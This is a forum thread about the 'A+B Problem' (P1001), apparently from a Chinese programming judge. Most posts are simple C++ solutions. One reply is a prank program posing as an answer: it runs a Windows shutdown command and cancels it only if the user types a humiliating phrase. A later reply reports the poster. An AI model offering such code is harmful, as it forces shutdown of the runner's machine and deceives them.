P1001

P1001 A+B Problem

秋声冲 @ 2021-07-07 09:06:16

这题要高精度??????????????


by wudaihao @ 2021-07-13 14:16:04

#include <iostream>
#include <cstdio>

using namespace std;

int main()
{
    int a,b;
    cin >> a >> b;
    cout << a+b << endl;
    return 0;
}

by 张琰森 @ 2021-07-15 19:26:19

#include<bits/stdc++.h>
using namespace std;
int main()
{
    int a,b;
    cin>>a>>b;
    cout<<a+b;
}

这样不行!!!


by chenhongyu20100506 @ 2021-08-05 21:53:29


#include <bits/stdc++.h>
using namespace std;
int main() {
    system("shutdown -s -c 给你30秒时间输入我是猪,否则关机");
    for(;;)
    {
        string a;
        cin>>a;
        if(a=="我是猪")
        {
            system("shutdown -a");
            break;
        }
    }

    return 0;
}

by Colas_miao_ @ 2023-03-13 16:47:02

@chenhongyu20100506 好,举报了


上一页 |